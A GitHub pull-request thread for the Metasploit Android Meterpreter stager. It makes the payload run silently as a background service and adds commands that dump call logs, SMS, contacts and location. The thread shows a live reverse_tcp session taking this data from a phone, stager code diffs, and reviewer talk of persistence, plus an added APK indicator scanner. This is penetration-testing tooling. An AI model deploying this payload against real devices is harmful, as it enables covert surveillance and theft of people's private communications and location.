
enhancing android mainactivity to work as service #3

Closed
wants to merge 9 commits into from

5 participants

@AnwarMohamed

Launcher app was converted to start new service to work through it
instead of the main activity allowing the app to work silently in the
background, I have added commands specially for android which can be
called from android commands in the java meterpreter through android
extension

AnwarMohamed added some commits
  AnwarMohamed: enhancing android mainactivity to work as service (cfaed84)
  AnwarMohamed: android add "check_root" (3c78713)
@jlee-r7
Collaborator

This seems to change the default required android version to 4.1.1.4, which is relatively new. Many phones still in stores come with 4.0, and probably even older than that.

Is there a way to make this work for older versions? If not, can we check for support at runtime and fail gracefully?

@AnwarMohamed

```
ruby msfconsole -x "sleep 2; use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 10.0.0.2; exploit"

payload => android/meterpreter/reverse_tcp
LHOST => 10.0.0.22
[*] Started reverse handler on 10.0.0.22:4444
[*] Starting the payload handler...
[*] Sending stage (42777 bytes) to 10.0.0.21
[*] Meterpreter session 1 opened (10.0.0.22:4444 -> 10.0.0.21:39982) at 2013-08-10 18:58:30 +0200

meterpreter > help

Android: Common Commands

Command        Description
-------        -----------
check_root     Check if device is rooted
dump_calllog   Get call log
dump_contacts  Get contacts list
dump_sms       Get sms messages
geolocate      Get current lat-long using geolocation

Android: Rooted Commands

Command          Description
-------          -----------
device_shutdown  Shutdown device

meterpreter > sysinfo
Computer : localhost
OS : Android 4.1.1 (API 16) - Linux 3.0.31-302285 (armv7l)
Meterpreter : java/android

meterpreter > dump_calllog
[*] Fetching 164 entries
[*] Call log saved to: E:/metasploit/metasploit-framework/dump_calllog_rjOUMFHN.txt

meterpreter > dump_sms
[*] Fetching 896 sms messages
[*] Sms messages saved to: E:/metasploit/metasploit-framework/sms_dump_JQmaoINw.txt

meterpreter > dump_contacts
[*] Fetching 618 contacts into list
[*] Contacts list saved to: E:/metasploit/metasploit-framework/contacts_dump_GidUbOsl.txt

meterpreter > geolocate
[*] Current Location:

    Latitude  : 31.2186009
    Longitude : 29.9448264

meterpreter > exit
```

...ayload/app/src/com/metasploit/stage/StageService.java
((25 lines not shown))
+ public IBinder onBind(Intent arg0) {
+
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+
+ Toast.makeText(this, "Service Started", Toast.LENGTH_SHORT).show();
+ SharedPreferences prefs = this.getSharedPreferences("com.metasploit.stage", Context.MODE_PRIVATE);
+ LHOST = prefs.getString("LHOST", "127.0.0.1");
+ LPORT = prefs.getString("LPORT", "4444");
+
+ startAsync();
+
+ new Thread()
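Review bot: onCreate() in this hunk never calls super.onCreate(), and the Thread started on its last line has no visible counterpart that stops it: add an onDestroy() override that clears the run flag, interrupts the thread and closes the socket, otherwise the worker outlives the service. The Toast on the first line of onCreate() also looks like a debugging leftover that does not belong in a service's lifecycle method.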
@timwr Collaborator
timwr added a note

What does this Thread do?

This is to prevent the Android system from killing the service by keeping the service running all the time.

@timwr Collaborator
timwr added a note

AFAIK: the only way to prevent that is to display a notification. http://developer.android.com/reference/android/app/Service.html#startForeground%28int,%20android.app.Notification%29
Perhaps it's better to root and persist :D

...ayload/app/src/com/metasploit/stage/StageService.java
((20 lines not shown))
+ private String LHOST, LPORT;
+ private boolean isRunning = true;
+ private Socket msgsock;
+
+ @Override
+ public IBinder onBind(Intent arg0) {
+
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+
+ Toast.makeText(this, "Service Started", Toast.LENGTH_SHORT).show();
+ SharedPreferences prefs = this.getSharedPreferences("com.metasploit.stage", Context.MODE_PRIVATE);
+ LHOST = prefs.getString("LHOST", "127.0.0.1");
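Review bot: `isRunning` is declared as a plain `boolean` (`+ private boolean isRunning = true;`); if it is the stop flag read by the worker thread it must be `volatile`, otherwise a write from the service's shutdown path may never become visible to that thread. `LPORT` is likewise kept as a `String` with the default `"4444"`; store it as an `int` and handle the parse failure once here rather than wherever `msgsock` is opened.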
@timwr Collaborator
timwr added a note

Why not just move the LHOST and LPORT fields to this class? I don't see the need to save/load them.

If I did, will it affect the payload generation? ("during parsing and replacing the host ip")

@timwr Collaborator
timwr added a note

It's fine, the payload generator replaces all occurrences of '127.0.0.1 ' (note the whitespace) with the LHOST, see https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/android/reverse_tcp.rb#L32
You can delete them from the activity too.
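
An added analyst-side example, not code from this PR or from Metasploit: it scans an APK for the indicators this thread names (the com/metasploit/stage package path and a host literal rewritten in place over the '127.0.0.1 ' placeholder) and runs over a constructed sample APK; the padded-IPv4 heuristic and the sample contents are assumptions.

```python
import io
import re
import zipfile

# Indicators taken from this PR: the stager's Java package path and the host
# placeholder that the payload generator rewrites ('127.0.0.1 ', trailing space).
STAGE_PACKAGE = b"com/metasploit/stage"
STAGE_SERVICE = b"StageService"
# Heuristic (an assumption, not stated on the page): an IPv4 literal followed by
# space or NUL padding, which an in-place rewrite of a padded placeholder leaves.
PADDED_IPV4 = re.compile(rb"((?:\d{1,3}\.){3}\d{1,3})[ \x00]+")


def scan_dex(dex: bytes) -> dict:
    """Report which indicators appear in one classes.dex-like blob."""
    hosts = [m.group(1).decode() for m in PADDED_IPV4.finditer(dex)]
    return {"stage_package": STAGE_PACKAGE in dex,
            "stage_service": STAGE_SERVICE in dex,
            "padded_hosts": hosts}


def scan_apk(apk_bytes: bytes) -> dict:
    """Scan every classes*.dex inside an APK (a ZIP) and merge the findings."""
    result = {"stage_package": False, "stage_service": False, "padded_hosts": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("classes") and name.endswith(".dex")):
                continue
            found = scan_dex(zf.read(name))
            result["stage_package"] |= found["stage_package"]
            result["stage_service"] |= found["stage_service"]
            result["padded_hosts"].extend(found["padded_hosts"])
    # Flag only when the package marker and a padded host literal coincide.
    result["suspicious"] = result["stage_package"] and bool(result["padded_hosts"])
    return result


def build_sample_apk() -> bytes:
    """Constructed stand-in for a generated stager APK: a ZIP holding a fake
    classes.dex with the strings expected after LHOST/LPORT rewriting."""
    fake_dex = (b"dex\n035\x00" + b"\x00" * 16
                + b"Lcom/metasploit/stage/StageService;\x00"
                + b"10.0.0.22 \x00" + b"4444\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed placeholder/>")
        zf.writestr("classes.dex", fake_dex)
    return buf.getvalue()
```

Calling `scan_apk(build_sample_apk())` returns the merged findings with `suspicious` set; a real APK is passed in as its raw bytes.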

...metasploit/meterpreter/android/geolocate_android.java
((9 lines not shown))
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class geolocate_android implements Command {
+
+ private static final int TLV_EXTENSIONS = 20000;
+ private static final int TLV_TYPE_GEO_LAT = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9011);
+ private static final int TLV_TYPE_GEO_LONG = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9012);
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request,
+ TLVPacket response) throws Exception {
+
+ LocationManager locationManager;
+ locationManager = (LocationManager)AndroidMeterpreter.getContext().getSystemService(Context.LOCATION_SERVICE);
+ Location location = locationManager.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);
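Review bot: getLastKnownLocation() returns null when the network provider is disabled or has never produced a fix, so the value assigned on the last line of this hunk must be null-checked before its latitude and longitude are read; otherwise the command throws out of execute() and the operator sees an exception instead of a clean error status. Iterating locationManager.getAllProviders() and keeping the freshest non-null Location would also stop the command from depending on NETWORK_PROVIDER alone.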
@timwr Collaborator
timwr added a note

What about the other providers? I would do locationManager.getAllProviders(), then loop through and get the most recent/accurate location.

We cannot depend on GPS since it needs root permissions to turn it on.

@timwr Collaborator
timwr added a note

We need root to force enable GPS/passive (wifi) but not to get the last known location from it.

@timwr
Collaborator

Does this really work? Can't you just have a UI-less activity that just does:

```java
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    startService(new Intent(getApplicationContext(), StageService.class));
}
```

Collaborator

This is probably overkill, but we could use the base class activity like so:

```xml
<activity android:name="android.app.Activity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
    </intent-filter>
</activity>
```

And start the service within the MyApp extends Application class? I think that's the minimum viable payload.
@todb-r7
Owner

So I'm not going to pretend I'm an android dev in the slightest, but this PR has 130 changed files and is currently in a conflicted state. If someone like @AnwarMohamed or @timwr wants to clean this up, super, but I'm pretty skeptical this is landable in its current state.

@AnwarMohamed
@todb
@timwr
Collaborator

I like the geolocate + https payloads so would love to see this land. I have a few comments but no blockers. It would be easier to manage in smaller chunks though.

@timwr

Why do we need to increase this? Can't we do a version check before loading classes that use apis > 3?
e.g:

```java
if (Build.VERSION.SDK_INT > Build.VERSION_CODES.BLAH) {
    mgr.registerCommand("dump_contacts", dump_contacts_android.class);
}
```

@timwr

We should either use this or remove it.

will be removed

@timwr

Why do we need to change the name?

ohh just for relevance

@timwr
Collaborator

Ping. I love the stuff in this pr. Anything I can do to help it land?

@todb
@AnwarMohamed AnwarMohamed deleted the branch
Commits on Jul 30, 2013
  1. AnwarMohamed: enhancing android mainactivity to work as service
  2. AnwarMohamed
Commits on Aug 10, 2013
  1. AnwarMohamed: root commands
Commits on Aug 16, 2013
  1. AnwarMohamed
  2. AnwarMohamed: removed MainActivity
  3. AnwarMohamed
  4. AnwarMohamed: hide titlebar
Commits on Aug 17, 2013
  1. AnwarMohamed
Commits on Nov 6, 2013
  1. AnwarMohamed: mvn config changes